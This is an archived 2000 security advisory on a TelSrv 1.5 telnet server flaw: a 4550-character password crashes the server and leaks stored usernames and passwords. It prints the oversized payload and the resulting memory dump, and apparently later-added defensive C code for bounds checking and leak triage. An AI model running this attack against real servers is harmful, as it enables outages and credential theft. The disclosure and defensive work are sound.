TelSrv Reveals Usernames & Passwords After DoS Attack

2000-07-28T00:00:00
ID SECURITYVULNS:DOC:492
Type securityvulns
Reporter Securityvulns
Modified 2000-07-28T00:00:00

Description


Details

Application: GAMSoft's TelSrv 1.5 (could be more... I don't have time to check, nor do I have the other programs)
Problem Type: Denial of Service Attack - Reveals User Names & Passwords
Author: Patrick Webster (mailto:webster@pis.com.au)
Platform: Win95 (could be more again... unable to test)
Risk Factor: High
Credibility: Patrick Webster (mailto:webster@pis.com.au)
Vendor Status: Contacted, but no reply.
Vendor Website: http://www.gamsoft.com
Discovered: 20th July, 2000 (Australian)
Reported: 28th July, 2000 (Australian)


Introduction

*Note: This is my first report, so forgive me if I make any mistakes / errors etc...

I first discovered this problem when trying to perform the Denial of Service attack on TelSrv 1.5 which was reported not long ago. I had downloaded TelSrv on 28 August 1999, and after playing around with it, decided I didn't need it, thus uninstalling it and forgetting about it. When I received the DoS report, I remembered I still had the installation, and decided to give it a go. What was odd was that when I did it, TelSrv didn't crash; it was working fine, prompting me for the password. I decided to try sending the 4550 characters as the password, and when I did, TelSrv crashed, sending back a bunch of unimportant characters. At first I thought these characters were worthless, until I noticed the message "Welcome Admin!" which was the message to be displayed upon login by user 'admin'. I then figured that if it displays the admin login message, it may very well display other hidden details. I set up another account to test for this - Username: 22222, Password: 11111. I did the crash again, and to my surprise, there, in the bunch of junk characters, were the numbers 22222 & 11111! I tried this again, using different names, such as a1b2c3, and when I tried the crash again, it displayed what looked like encrypted characters (eg. ?1u2д3, not accurate though). With this in mind, I decided that I would find the encrypted values of each character, by creating account names such as ABCabc123!@# and so on, and writing a program to decrypt this.

I created a text file, which was to contain the encrypted version of the character and a decrypted version, and while I was using 'cut & paste' to transfer the encrypted character to the text file, I noticed that the character had now changed to its real form. The character had changed due to the difference in DOS characters to Windows characters (??bit - 32bit?), the DOS characters being shown in telnet & Notepad, whereas the Windows symbols were shown in Wordpad. This explains why the numbers were the same compared to the letters, which were different. So basically, all you have to do is use the DoS attack, using 4550 characters (maybe less?), copy the data which is forced back, view it with Wordpad or the like, and simply look through the data for any recognisable words etc. One username always seems to be displayed after the file's path, so that is a start.


Exploit

The problem is inadequate bounds checking on the password input: when you connect to the TelSrv Telnet Server and supply 4550 characters as the password, the telnet service crashes and responds to the client with data containing TelSrv usernames, passwords & custom login messages. This data can then be used to log in to TelSrv. The only problem is that it crashes the server upon execution.
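The root cause named above, a fixed-size field filled from the network without a length check, is the classic pattern. The following is an added example written for this page, not TelSrv code: PASSWORD_MAX, the helper names and the 4550-byte input are constructed to mirror the advisory (the real TelSrv buffer size is not known). It shows the unsafe copy only as a comment and implements the checked version that rejects an oversized line instead of writing past the buffer.

```c
/* Added example, not TelSrv code: a fixed-size password field read with and
 * without a length check.  PASSWORD_MAX and the 4550-byte test input are
 * constructed to mirror the advisory; the real TelSrv buffer size is unknown. */
#include <stdio.h>
#include <string.h>

#define PASSWORD_MAX 64          /* assumed size of the server's password field */
#define OVERSIZED_LEN 4550       /* the input length the advisory reports */

/* Vulnerable pattern (for comparison only, deliberately never called):
 * copies whatever the client sent into a fixed buffer, so a line longer than
 * PASSWORD_MAX overwrites whatever follows the buffer in memory.
 *
 *     char buf[PASSWORD_MAX];
 *     strcpy(buf, line);
 */

/* Hardened pattern: measure the input without reading past outsz bytes and
 * reject anything that does not fit together with its terminator.  Returns 1
 * on success (password copied to out) and 0 when rejected.  The log line
 * records only the limit, never the submitted bytes. */
int accept_password(const char *line, char *out, size_t outsz)
{
    size_t n = 0;
    while (n < outsz && line[n] != '\0')
        n++;
    if (n >= outsz) {
        fprintf(stderr, "login rejected: password exceeds %zu bytes\n", outsz - 1);
        out[0] = '\0';
        return 0;
    }
    memcpy(out, line, n + 1);
    return 1;
}

/* A normal-length password from the advisory's example account. */
int demo_normal(void)
{
    char out[PASSWORD_MAX];
    return accept_password("22222password22222", out, sizeof out);
}

/* The boundary: PASSWORD_MAX - 1 bytes fit, PASSWORD_MAX bytes do not. */
int demo_boundary(size_t len)
{
    char in[PASSWORD_MAX + 2];
    char out[PASSWORD_MAX];
    if (len > PASSWORD_MAX + 1)
        return -1;
    memset(in, 'A', len);
    in[len] = '\0';
    return accept_password(in, out, sizeof out);
}

/* The advisory's 4550-byte line: rejected instead of overflowing. */
int demo_oversized(void)
{
    static char in[OVERSIZED_LEN + 1];
    char out[PASSWORD_MAX];
    memset(in, 'A', OVERSIZED_LEN);
    in[OVERSIZED_LEN] = '\0';
    return accept_password(in, out, sizeof out);
}

int main(void)
{
    printf("normal: %d  63 bytes: %d  64 bytes: %d  4550 bytes: %d\n",
           demo_normal(), demo_boundary(63), demo_boundary(64), demo_oversized());
    return 0;
}
```

In a real server the rejection path also has to discard the rest of the oversized line from the socket before prompting again, otherwise the leftover bytes are read as the next command.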

Start Example:

*Note: For this example, I have created only one account, details are as follows...

Username: 11111username11111
Password: 22222password22222
Custom Message: This is the custom greeting message!

If you look towards the end of the following code, you will see that '11111username11111, 22222password22222 & This is the custom greeting message!' are displayed. They are displayed normally because of the formatting of this document.

Please Wait...Connection Accepted (TelSrv 1.5)

This copy of TelSrv is not registered. Registration will remove this message and the 5 second delay...

Username : (none, just hit enter)

Password : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA *********AdjustTokenPriveleges Failed : %lu AdjustTokenPriveleges Failed : %lu (%s) LookupPrivilegeValue Failed : %lu LookupPrivilegeValue Failed : %lu (%s) SeShutdownPrivilegeOpenProcessToken Failed : %lu OpenProcessToken Failed : %lu (%s)

Requesting shutdown priveleges...

Unknown command

Goodbye! exitError : No priveleges for that operation dosshutdownShutdown failed! If your host system is Windows NT, this process does not have priveleges to shut down the system.

Shutting down... reboothelpPassword :

Error : User database version does not match program version.Note : User database will be converted to new version of TelSrv.Could not save user database.No users are defined. Nobody can log in to the server.S.EXE""%s".DAT.HLPGAMSoftC:\TELSRV.LOG.LOG\LOGIN.WAV\LOGOUT.WAVяяCTel srvDlgWhatWhenWhoTelSrv (0 Connections)TelSrv (%d Connections)Number of connections : %dAre you sure you want to terminate TelSrv?Cant access log file!!Server%-25s%-25s%s %d/%d/%d %d:%02d:%02dLogging in...%d.%d.%d.%dPlease Wait...Logged in as "%s"Login as "%s" failedConnection terminatedFailed to stop the server.Warning! There are active connection(s). If you stop the server now, these connections will be terminated.

Are you sure you want to stop the server?Failed to start the server. This can be caused by several problems :

TCP/IP is not installed on this system. The port number is invalid. The port number is already in use by another application.Server ConfigurationDеI_xC§/Уќк¶ТЂkZЁ§Ш ¦@Lа@J_?µ@xCXчeюяѕДs)А75@Pxѕщ @н)eЃ° xШ S xЂ xр SC:\PROGRAM FILES\TELSRV\TELSRV.DAT"C:\PROGRAM FILES\TELSRV\TELSRVS.EXE"11111username11111)kЦл,©!»п__LьмѕФнQEM™%ЋQeS\3м?T§" НLж9!s‹РЎZPc'2ШцЁйщЂr@ЌnyмЎ+r6'g¶v5кЭу1N рП 522222password22222Й°№К-ЫьАмЄ ГОCA‚o1Дsьeќuќ/Х·›пODыд/УЭ]b‡О"}FпT‰Ђl7Ш }[мВ73?щ!yђ5Ц™ЏЪФћgЁ+Ф~тvOЭAoИЗїgХ h+каЗ>‡UThis is the custom greeting message!!?І9фD5ТЖуґмСЏЦHўІ4-СUM5GґБ$‰T/Ґ·Оa)Ђ"ьЃЌО{z$LYт«a¤ж2Ч]^ ™ЌcТgќ‚ФU:=9ЋMYrЭhVЫI„dwе.M7Т+·J·Цсp"maзЗБхнмЩЧк вО°й‚KЈ"b/#йШІє»в@цMфyґ2Р ‹:‰8њ""Ґ5MЋ‰°;ъ>ИдwхdлйLM'7Њі'МаU8Ъ%X™€пэџСКънНЌU§(ЄЌ‰:? ир¬ьВK5ІЧ¬{t§ъЊфdRУ№µД«$/уdТ†bX_Д/;-vXоНґ0@ иЛa¦›ґууcҐђUвПРНњ ±oa Bљ$&#39;&#37;§ЮQnGЖџжёoD„љЋ&#37;Y&#92;ћ9ј&#39; z™Uј·Ф&#39;€.&#39;жЎ; Ј‡:^РпkЙРзНM]G-…BЬx‰тG&ЮSцІ…n¶DdьЋ>_¤t-Я}Ьu'лdдЅ$Ьr&PYгТДЖ<РЮ„Сaaaaaaaaaaaa aaaaaaaaaaa¦иАQA-NDкчNџьC?ђiеМ|!(ј1j#™-В<зЋxѕЙЊY5!UўOТ{Щщ-W]h~ЙBѕM^oWМ'І м›"тІф±њdъв{uхU*1LО$©бzМи}іgшerbyйв&quot;жОwҐSд-іѕQћ§{]V®5ЎЁcЪС?&#37;f-иєQќ5ґyFќ 8тўъџ№hqCA~&#40;-дЎГ &#40;&#92;ёW:ќ&#37;®!Ќ]ХЌ&#40;ЭФ&#41;б8,Fe€‚‹цI-7O?$:јхўmГh]ЩXЂ#ћ &quot; WAћy§5±9по!Щчв&gt;J-&amp;®Т«Њ·Ы4h6Ц»З М†,]_b¬Хn-utv+ЪCі&amp;тй!O Аdм9&#41;±L&#41;5xPЈ1„ Ф&#40;‡?]VїI&#92;ak·/AЅ/wЪ&lt;6К/е 7·e‚Z§ШцTу ]ІѕЃуЮIy‚W&#41;?ЬЋ ЏУ&amp;ЙЫЊс }Э |ЮэґРЇм УПМ фbх¦…Н&#39;Хк&quot;vѕD№»…$$SЉ8‡¶3№Ћу…}ъШjе БЛу±Ђ·/xЎіјтgаЛ6¬ёLџbМїwйЁЙ1¦cНьj-ЃbЪ-EАгgT УіHJђљ7ы:щЁ'г(шё}cРз"ТKЌ-Q-8ЗҐЎN4џъ/C"кg-ѕd-И{УUб±&ђЭлL[»‚mГУ3НбЕ(

End Example.


Notes

Some odd things I noticed are things such as that TelSrv did NOT crash every time I performed the operation. I also noticed that it did not always display the full username, password or whatever you're looking for. Sometimes it didn't even respond with any information, just another login prompt. I noticed that when using Windows 95's default telnet application (telnet.exe), the information containing the usernames etc. did not convert the usernames to their original form, whereas SecureCRT did correctly display the data, which was what I used for this. There are quite possibly many more interesting things people may come across; people may even wish to look into this further, maybe even figure out where the exact location of the different usernames & passwords occur (if there is any formatting in the data) or maybe there is something else valuable in the data (other than revealing the remote path of the server, in this case C:\PROGRAM FILES\TELSRV\).
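Both the Introduction (looking through the returned data for recognisable words) and the note above (the leak is partial and not always present) come down to the same incident-response question: which readable text did a given crash response carry, so that the exposed accounts can be rotated? The following is an added example, not code from the advisory or from GAMSoft: `sample` is a constructed byte string that imitates the dump (a file path and the example account's fields between non-text bytes), and `extract_strings`, `leaked_count` and `leaked` are names chosen here. It lists every run of printable ASCII in the buffer, treating bytes of 0x80 and above as separators, which are exactly the bytes a terminal renders differently depending on code page.

```c
/* Added example, not TelSrv code: the check an incident responder runs over a
 * captured crash response to list what readable text it carried.  'sample' is
 * a constructed byte string imitating the advisory's dump; it is not real
 * TelSrv output. */
#include <stdio.h>
#include <string.h>

#define MAX_STRING 128
#define MAX_FOUND  32

static const unsigned char sample[] =
    "\xff\xff" "TelSrv (0 Connections)" "\x01\x02" "ab" "\x80\x81\x82"
    "C:\\PROGRAM FILES\\TELSRV\\TELSRV.DAT" "\xd0\xb6\x11"
    "11111username11111" "\x9a\x7f\x00\x05" "22222password22222"
    "\xff" "Th" "\x04";

/* Copy every run of at least minlen printable ASCII bytes (0x20..0x7E) out of
 * buf into found, NUL-terminated and truncated to MAX_STRING - 1 bytes.
 * Bytes outside that range (control bytes and anything 0x80 and above) act
 * as separators.  Returns the number of runs stored. */
size_t extract_strings(const unsigned char *buf, size_t len, size_t minlen,
                       char found[][MAX_STRING], size_t maxfound)
{
    size_t count = 0, start = 0, i;
    for (i = 0; i <= len; i++) {
        /* position len acts as a final separator so a trailing run is flushed */
        if (i < len && buf[i] >= 0x20 && buf[i] <= 0x7E)
            continue;
        size_t runlen = i - start;
        if (runlen >= minlen && count < maxfound) {
            if (runlen > MAX_STRING - 1)
                runlen = MAX_STRING - 1;
            memcpy(found[count], buf + start, runlen);
            found[count][runlen] = '\0';
            count++;
        }
        start = i + 1;
    }
    return count;
}

/* Number of runs of six or more readable bytes in the constructed sample. */
size_t leaked_count(void)
{
    char found[MAX_FOUND][MAX_STRING];
    return extract_strings(sample, sizeof sample - 1, 6, found, MAX_FOUND);
}

/* 1 if one of those runs is exactly 'needle', e.g. a known account name or
 * password, which tells the responder that credential must be rotated. */
int leaked(const char *needle)
{
    char found[MAX_FOUND][MAX_STRING];
    size_t n = extract_strings(sample, sizeof sample - 1, 6, found, MAX_FOUND);
    for (size_t i = 0; i < n; i++)
        if (strcmp(found[i], needle) == 0)
            return 1;
    return 0;
}

int main(void)
{
    char found[MAX_FOUND][MAX_STRING];
    size_t n = extract_strings(sample, sizeof sample - 1, 6, found, MAX_FOUND);
    for (size_t i = 0; i < n; i++)
        printf("%2zu: %s\n", i, found[i]);
    return 0;
}
```

The minimum run length of six drops the two-letter fragments that every memory region produces; since the note above says a field is not always returned whole, a responder should match the output against the account list rather than rely on the dump alone, and rotate every account the server held if the dump is inconclusive.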


Credibility

This was discovered by myself (Patrick Webster) around the 20th July 2000 (maybe a day or two earlier), not long after the known DoS attack was released. I acknowledge that I am using the method discovered by someone else in a DoS attack, but I am yet to receive a report of the DoS attack (being used on the password prompt) which actually reveals the usernames & passwords of TelSrv, so I believe no one else has discovered it yet :)


Greetings

Greets go out to my girlfriend Jo, ZeroX, AkirA, NEO, Blockhead, Lozza, Chatalade and anyone else I missed...

-Pothead


Contact Information

If I really need to be contacted, you can reach me at either... mailto:webster@pis.com.au (preferred) or mailto:dope_squad@hotmail.com

Cheers from Australia :) & sorry for the length of this message.

-Patrick Webster